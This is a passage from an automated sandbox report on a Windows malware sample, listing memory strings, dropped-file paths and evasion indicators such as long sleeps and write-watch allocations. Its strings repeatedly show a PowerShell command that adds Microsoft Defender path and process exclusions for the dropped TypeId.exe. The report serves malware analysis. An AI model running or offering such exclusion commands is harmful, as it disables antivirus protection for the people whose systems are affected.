Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;P^
Source: TypeId.exe, 00000003.00000002.2028789957.0000000008E65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEKB
Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NPROCESS TYPEID.EXE;
Source: file.exe, 00000000.00000002.1763526633.00000000035E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXED
Source: TypeId.exe, 00000003.00000002.1948488274.000000000695E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NNELS\HWRTALNMJ\TYPEID.EXE
Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE@
Source: powershell.exe, 00000006.00000002.2358271034.000002112F437000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXERYOUTPUT DEVICE ERRORPERFORMANCE DEGRADEDPOWER PROBLEMPRESSURE UNACCEPTABLEPROCESSOR PROBLEM (INTERNAL MACHINE ERROR)PUMP FAILUREQUEUE SIZE EXCEEDEDRECEIVE FAILURERECEIVER FAILUREREMOTE NODE TRANSMISSION ERRORRESOURCE AT OR NEARING CAPACITYRESPONSE TIME EXCESSIVERETRANSMISSION RATE EXCESSIVESOFTWARE ERRORSOFTWARE PROGRAM ABNORMALLY TERMINATEDSOFTWARE PROGRAM ERROR (INCORRECT RESULTS)STORAGE CAPACITY PROBLEMTEMPERATURE UNACCEPTABLETHRESHOLD CROSSEDTIMING PROBLEMTOXIC LEAK DETECTEDTRANSMIT FAILURETRANSMITTER FAILUREUNDERLYING RESOURCE UNAVAILABLEVERSION MISMATCHPREVIOUS ALERT CLEAREDLOGIN ATTEMPTS FAILEDSOFTWARE VIRUS DETECTEDHARDWARE SECURITY BREACHEDDENIAL OF SERVICE DETECTEDSECURITY CREDENTIAL MISMATCHUNAUTHORIZED ACCESSALARM RECEIVEDLOSS OF POINTERPAYLOAD MISMATCHTRANSMISSION ERROREXCESSIVE ERROR RATETRACE PROBLEMELEMENT UNAVAILABLEELEMENT MISSINGLOSS OF MULTI FRAMEBROADCAST CHANNEL FAILUREINVALID MESSAGE RECEIVEDROUTING FAILUREBACKPLANE FAILUREIDENTIFIER DU
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_7764.TXT
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXECOMMONPROGRAMFILP
Source: file.exe, 00000000.00000002.1763526633.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001677000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG
Source: powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1941849554.0000000006899000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001677000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXEIN<
Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE0
Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE;
Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: file.exe, 00000000.00000002.1789340533.0000000007658000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1761959990.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1788582879.000000000726F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1787378066.000000000703C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.00000000035E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <COMMAND>C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE</COMMAND>
Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \S-1-5-21-2246122658-3693405117-2476756634-1002\HWRTALNMJ\TYPEID.EXE
Source: file.exe, 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2289203789.00000182C74F1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1941849554.0000000006899000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003689000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1835768754.00000000012F7000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.2030654642.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.2022257156.00000000085C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE
Source: TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE[T
Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X\MICROSOFT\WINDOWS\REGISTEREDCHANNELS\TYPEIDLS\HWRTALNMJ\TYPEID.EXE
Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K+ ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.2028789957.0000000008E65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEYQ4
Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESS TYPEID.EXE;
Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_7764.TXT
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: 1780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 3370000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 1780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 6B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 7B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 7CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 8CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 9EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 1620000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 3120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 5120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 6D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 7D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 15C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3050000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 5050000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 6A90000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 7A90000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 8B50000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 9B50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: E60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: 2850000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: 63C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: 73C0000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 3351 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 910 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5856 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3886 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Window / User API: threadDelayed 1719 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Window / User API: threadDelayed 2069 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4960 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4684 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8118
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1388
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Window / User API: threadDelayed 3588
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Window / User API: threadDelayed 601
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -16602069666338586s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7660 Thread sleep count: 3351 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7660 Thread sleep count: 910 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99108s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98877s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98526s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -97906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7620 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 Thread sleep count: 5856 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920 Thread sleep count: 3886 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -13835058055282155s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7864 Thread sleep count: 1719 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7864 Thread sleep count: 2069 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99874s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99546s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99434s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99316s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99187s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98921s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98804s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98687s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98574s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98468s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98359s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -98249s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -97989s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -97859s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -97746s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7844 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7812 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -35971150943733603s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080 Thread sleep count: 4960 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080 Thread sleep count: 4684 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99797s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99670s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99562s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99448s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99343s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99234s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99122s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -99001s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98875s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98766s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98624s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98507s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98389s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98272s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98141s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -98000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59881s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59757s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59641s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59515s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59387s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59278s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59171s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -59062s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58942s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58801s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58643s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58516s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58397s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58259s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060 Thread sleep time: -58141s >= -30000s Jump to behavior
